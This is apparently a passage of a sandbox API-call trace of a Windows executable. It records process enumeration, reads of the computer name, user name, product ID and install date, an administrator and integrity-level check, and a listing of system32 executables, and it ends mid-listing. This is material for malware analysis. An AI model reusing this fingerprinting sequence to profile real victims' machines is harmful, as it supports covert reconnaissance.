	[0088.051] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.051] CloseHandle (hObject=0x214) returned 1
	[0088.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x214
	[0088.051] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.051] CloseHandle (hObject=0x214) returned 1
	[0088.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x214
	[0088.051] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.051] CloseHandle (hObject=0x214) returned 1
	[0088.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x214
	[0088.051] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.051] CloseHandle (hObject=0x214) returned 1
	[0088.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x214
	[0088.051] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.051] CloseHandle (hObject=0x214) returned 1
	[0088.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x934) returned 0x214
	[0088.052] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.052] CloseHandle (hObject=0x214) returned 1
	[0088.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x214
	[0088.052] IsWow64Process (in: hProcess=0x214, Wow64Process=0x262fa28 | out: Wow64Process=0x262fa28) returned 1
	[0088.052] CloseHandle (hObject=0x214) returned 1
	[0088.053] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0088.053] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0088.053] GetVersion () returned 0x23f00206
	[0088.053] GetCurrentProcessId () returned 0x934
	[0088.053] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.053] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualQuery") returned 0x765b7a90
	[0088.053] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.054] GetProcAddress (hModule=0x765a0000, lpProcName="GetNativeSystemInfo") returned 0x765bac70
	[0088.054] GetNativeSystemInfo (in: lpSystemInfo=0x262fa70 | out: lpSystemInfo=0x262fa70*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0088.054] GetComputerNameW (in: lpBuffer=0x658b50, nSize=0x262fae0 | out: lpBuffer="X2VS1CUM", nSize=0x262fae0) returned 1
	[0088.054] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x262fab4 | out: phkResult=0x262fab4*=0x214) returned 0x0
	[0088.054] RegQueryValueExA (in: hKey=0x214, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x653fa0, lpcbData=0x262fab8*=0xc8 | out: lpType=0x0, lpData=0x653fa0*=0xa4, lpcbData=0x262fab8*=0xa4) returned 0x0
	[0088.054] RegQueryValueExA (in: hKey=0x214, lpValueName="InstallDate", lpReserved=0x0, lpType=0x0, lpData=0x262faa8, lpcbData=0x262fab8*=0x4 | out: lpType=0x0, lpData=0x262faa8*=0x3f, lpcbData=0x262fab8*=0x4) returned 0x0
	[0088.054] RegCloseKey (hKey=0x214) returned 0x0
	[0088.054] lstrlenA (lpString="00342-50487-12048-AAOEM") returned 23
	[0088.054] GetComputerNameA (in: lpBuffer=0x64ff50, nSize=0x262fab8 | out: lpBuffer="X2VS1CUM", nSize=0x262fab8) returned 1
	[0088.054] lstrlenA (lpString="X2VS1CUM") returned 8
	[0088.054] IsUserAnAdmin () returned 0
	[0088.055] CreateWellKnownSid (in: WellKnownSidType=0x27, DomainSid=0x0, pSid=0x262faa8, cbSid=0x262fab4 | out: pSid=0x262faa8*(Revision=0x0, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x81, [1]=0x59, [2]=0xa9, [3]=0xfe, [4]=0x69, [5]=0x6), SubAuthority=([0]=0xf0, [1]=0xfa, [2]=0x62, [3]=0x2, [4]=0xc)), cbSid=0x262fab4) returned 0
	[0088.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x262fa40 | out: TokenHandle=0x262fa40*=0x218) returned 1
	[0088.055] GetTokenInformation (in: TokenHandle=0x218, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x262fa48 | out: TokenInformation=0x0, ReturnLength=0x262fa48) returned 0
	[0088.055] GetLastError () returned 0x7a
	[0088.055] GetTokenInformation (in: TokenHandle=0x218, TokenInformationClass=0x19, TokenInformation=0x658fe8, TokenInformationLength=0x14, ReturnLength=0x262fa48 | out: TokenInformation=0x658fe8, ReturnLength=0x262fa48) returned 1
	[0088.055] GetSidSubAuthorityCount (pSid=0x658ff0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x658ff1
	[0088.055] GetSidSubAuthority (pSid=0x658ff0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x658ff8
	[0088.055] CloseHandle (hObject=0x218) returned 1
	[0088.055] GetUserNameW (in: lpBuffer=0x262fb08, pcbBuffer=0x262fdbc | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x262fdbc) returned 1
	[0088.055] SetEnvironmentVariableW (lpName="USERNAME", lpValue="Nd9E1FYi") returned 1
	[0088.056] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0088.056] GetProcAddress (hModule=0x77960000, lpProcName="ZwOpenProcess") returned 0x779d6f00
	[0088.056] NtOpenProcess (in: ProcessHandle=0x262fa50, DesiredAccess=0x400, ObjectAttributes=0x262fa20*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x262fa38*(UniqueProcess=0x934, UniqueThread=0x0) | out: ProcessHandle=0x262fa50*=0x218) returned 0x0
	[0088.056] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0088.056] GetProcAddress (hModule=0x77960000, lpProcName="ZwOpenProcessToken") returned 0x779d7e10
	[0088.056] NtOpenProcessToken (in: ProcessHandle=0x218, DesiredAccess=0x8, TokenHandle=0x262fa64 | out: TokenHandle=0x262fa64*=0x214) returned 0x0
	[0088.056] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0088.057] GetProcAddress (hModule=0x77960000, lpProcName="ZwQueryInformationToken") returned 0x779d6eb0
	[0088.057] NtQueryInformationToken (in: TokenHandle=0x214, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x262fad4 | out: TokenInformation=0x0, ReturnLength=0x262fad4) returned 0xc0000023
	[0088.057] CloseHandle (hObject=0x214) returned 1
	[0088.057] CloseHandle (hObject=0x218) returned 1
	[0088.057] GetSystemDirectoryW (in: lpBuffer=0x65b070, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.057] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.057] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 0x6536f8
	[0088.057] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.058] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.059] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.060] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.061] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
	[0088.062] FindNextFileW (in: hFindFile=0x6536f8, lpFindFileData=0x65ae18 | out: lpFindFileData=0x65ae18) returned 1
